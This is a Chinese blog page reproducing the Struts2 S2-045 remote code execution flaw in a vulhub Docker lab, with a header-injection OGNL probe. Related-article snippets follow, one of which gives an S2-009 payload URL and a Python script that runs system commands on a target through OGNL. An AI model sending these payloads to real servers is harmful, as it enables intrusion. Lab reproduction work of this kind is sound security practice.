Struts2 漏洞复现之s2-045

最新推荐文章于 2024-06-24 08:00:00 发布
最新推荐文章于 2024-06-24 08:00:00 发布
阅读量3k 收藏
点赞数 1
分类专栏: Struts2 漏洞复现 文章标签: struts2 docker-compose
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_51220765/article/details/111183765
版权
本文介绍了Struts2的s2-045漏洞,该漏洞源于Jakarta插件的文件上传功能,允许攻击者通过修改Content-Type执行系统命令。受影响的版本包括Struts 2.3.5到2.3.31及2.5到2.5.10。文中详细讲述了漏洞复现步骤,包括构造POC并使用Burpsuite进行数据包篡改。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Struts2 漏洞复现之s2-045

原理:

在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。
影响版本:
Struts 2.3.5 - Struts 2.3.31
Struts 2.5 - Struts 2.5.10

1.进入045

cd vulhub-master/struts2/s2-045

2.开启045

docker-compose up -d

在这里插入图片描述
3.访问靶机ip:8080
在这里插入图片描述
3.构造poc,使用抓包工具Burpsuite,修改数据包插入poc
poc1:
%{#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’].addHeader(‘vulhub’,233233)}.mul

最低0.47元/天 解锁文章
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-045(CVE-2017-5638)
qq_51577576的博客
10-17 799
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-045(CVE-2017-5638) 在使用基于Jakarta插件的文件上传功能时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大危害。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1809
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
struts2漏洞s2-045漏洞利用测试
feinifi的博客
02-20 6495
s2-045漏洞是一个可以执行远程命令的漏洞,该漏洞struts2上传文件使用参数struts.multipart.parser=jakarta,并且文件上传采用了commons-fileupload的api导致的。只是使用struts.multipart.parser=jakarta并不能导致这个问题,需要在请求时,请求头使用Content-Type参数,这个参数必须带上一串奇怪的ognl表达...
S2-045漏洞复现
不曾扬帆,何以至远方
07-14 2146
S2-045(CVE-2017-5638)漏洞复现
struts2 S2-045漏洞
qzxdh的专栏
03-07 6405
Apache Struts 2被曝存在远程命令执行漏洞漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。 漏洞编号:  CVE-2017-5638 漏洞名称: 基于 Jakarta plugin插件的Struts远程代码执行漏洞 官方评级: 高危 漏洞描述:
S2-045 远程代码执行漏洞(CVE-2017-5638)
qq_43665434的博客
03-28 999
S2-045 远程代码执行漏洞(CVE-2017-5638) ​ struts2是基于MVC设计模式的Java Web框架技术之一,struts2框架按照MVC的设计思想把Java Web应用程序分为控制层,包括核心控制器FilterDispatcher和业务控制器Action,模型层,包括业务逻辑组件和数据库访问组件,视图层,包括HTML、JSP、struts2标签等。 The Jakarta Multipart parser in Apache Struts 2 2.3.x before
Struts2 漏洞复现之s2-016
weixin_51220765的博客
12-14 1032
Struts2 漏洞复现之s2-016 原理: 在struts2中,DefaultActionMapper类支持以"action:"、“redirect:”、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令。 1.进入016 cd vulhub-master/struts2/s2-016 2.开启016 docker-compose up -d 3.访问靶
vulhub-S2-045 远程代码执行漏洞(CVE-2017-5638)
m0_58265086的博客
09-09 306
7.经过上述步骤说明存在RCE漏洞,在Content-type 那里输入下述代码,获得目标信息。(img-r2CRZuMV-1694240577132)]6.在repeater模块修改数据包,验证是否存在RCE 漏。5.将bp中的数据包发送到的repeter。8.出现root则表示执行成功。9/出现ip表示执行成功。9/出现ip表示执行成功。
Apache Struts2(S2-045漏洞升级指南
03-07
Apache Struts2(S2-045漏洞升级指南,用于指导Apache Struts2(S2-045漏洞的本地升级工作
s2-045漏洞分析
热门推荐
Exploit的小站~
05-10 1万+
这个分析写的我有点汗颜,强烈建议抵制struts2,改为更加可靠的SpringMVC。 背景是,Struts2默认处理multipart报文的解析器是jakarta,是这个组件出现了问题。 该组件定义在了struts-default.xml中,因此,只要不修改parser,并且版本在受影响范围内,肯定是有问题的。 令我非常疑惑的是,一个content-type怎么就能用ognl解析...
Struts2 S2-045 远程代码执行漏洞(CVE-2017-5638)
qq_68163788的博客
06-24 1706
Struts2是一个基于MVC设计模式的流行且成熟的Web应用程序框架. Struts2不仅仅是Struts 1的新版本,它完全重写了Struts架构.Webwork框架最初以Struts框架为基础,其目标是提供一个基于Struts的增强和改进的框架,使开发人员更容易进行Web开发.过了一段时间,Webwork框架和Struts社区携手创建着名的Struts2框架.(也可以将struts2比作于一个大的servlet当基于Jakarta插件上传文件时,可导致远程代码执行。
S2-045 Struts 2漏洞(CVE-2017-5638) 实战
shylcok的博客
08-11 896
公司接到阿里云需要升级Struts 2的邮件,因为 我们公司用的 Struts 2版本 有远程代码执行漏洞。但是 如果执行一些和文件,目录相关的操作 就会提示: 没有那个文件或目录。1.抓包,使用bp或者Charles都行 (我这使用Charles)现在可以执行查看路径等一些权限,但是还做不到删除,新增等一些操作。重要的是,下图中 Content-Type的内容 进行修改。2.改包(1.打断点2.repeat一下3修改需要修改的)当中的重点就是加粗字体:(#cmd='"ls"')......
Vulhub下的Struts-2漏洞复现
weixin_44508748的博客
04-12 1万+
参考网址: https://github.com/phith0n/vulhub/tree/master/struts2/ Struts-S2-001 远程代码利用表单验证错误 1.漏洞描述 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的...
struts2-045漏洞poc调试
jameson_的专栏
05-24 2121
漏洞概述:struts2默认的上传插件Jakarta Multipart parser的文件上传模块在处理文件上传含(multipart/form-data)的请求时候对异常信息做了捕获,并对异常信息做了OGNL表达式处理。但在在判断Content-Type不正确的时候会抛出异常并且带上Content-Type属性值,可通过构造附带OGNL表达式的URL导致远程代码执行。 漏洞场景: 配置了s
漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞
weixin_67503304的博客
08-22 7745
从源码的角度分析Struts2(s2-045)远程命令执行漏洞,利用java详细讲解造成漏洞的原因,包含了Structs2高危漏洞exp的扫描利用工具
struts2 s2-045漏洞利用poc
isinstance的博客
03-10 6937
直接上代码了亲测有用 第一个是检测有没有这个漏洞的 import requestsimport sys def poc(url): payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#con
S2-045 分析
three_feng的博客
03-08 3139
首先看了 http://bobao.360.cn/learning/detail/3574.html  这篇文章,文章把整体的思路都分析得很清楚了,我补充一下自己的调试细节。 在处理 multipart 的时候发生了异常,进入 org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest 中的 parse方法的异常处理分支
struts2漏洞复现s2-009
最新发布
04-01
### Struts2 S2-009 漏洞复现方法 Struts2 的 S2-009 漏洞主要源于其对 OGNL 表达式的处理不当,允许攻击者通过特定的输入执行任意代码。以下是关于该漏洞的具体分析以及如何进行复现的方法。 #### 背景介绍 Struts2 对于之前版本中的某些安全问题进行了修复,例如针对 S2-003 和 S2-005 的修补措施分别涉及禁用 `#` 号和反斜杠 `\` 符号[^1]。然而,在这些修复之后,新的绕过方式被发现并最终导致了 S2-009 漏洞的发生。 #### 影响范围 此漏洞影响以下版本: - **Struts 2.0.0 到 Struts 2.3.14.2** #### 漏洞原理 S2-009 是由于开发者未能完全阻止恶意用户构造特殊的 URL 参数来触发 OGNL 表达式解析器的行为所致。具体来说,即使框架已经尝试过滤掉一些敏感字符(如 `#`),但仍然可以通过其他手段实现类似的逻辑操作,从而达到远程命令执行的目的。 #### 复现步骤描述 为了成功重现这一漏洞,可以按照如下方式进行设置: 1. 准备目标应用程序环境,确保运行的是受影响范围内未打补丁的 Struts 版本; 2. 构造含有恶意 payload 的 HTTP 请求发送给服务器端口监听地址; - Payload 示例形式可能类似于下面这样 (需替换实际 IP 地址) : ```bash http://<target-ip>:8080/example.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22cmd.exe%22,%22/c%22,%22dir%22})).start()} ``` 上述例子展示了如何利用 `${}` 结构嵌入一段 Java 代码片段到请求参数当中去调用系统 shell 命令。 注意:以上仅为理论说明用途,请勿非法测试他人网站! #### 防护建议 为了避免此类安全隐患再次发生,官方推荐采取以下防护策略之一或者组合使用它们: - 升级至最新稳定版 Struts 库文件; - 自定义配置白名单验证机制限制外部可控变量的内容类型; - 开启开发模式下的调试日志记录功能以便及时发现问题所在位置。 ```python import requests url = 'http://localhost:8080/example.action' payload = {'redirect': '${@java.lang.Runtime@getRuntime().exec("id")}'} response = requests.get(url, params=payload) print(response.text) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值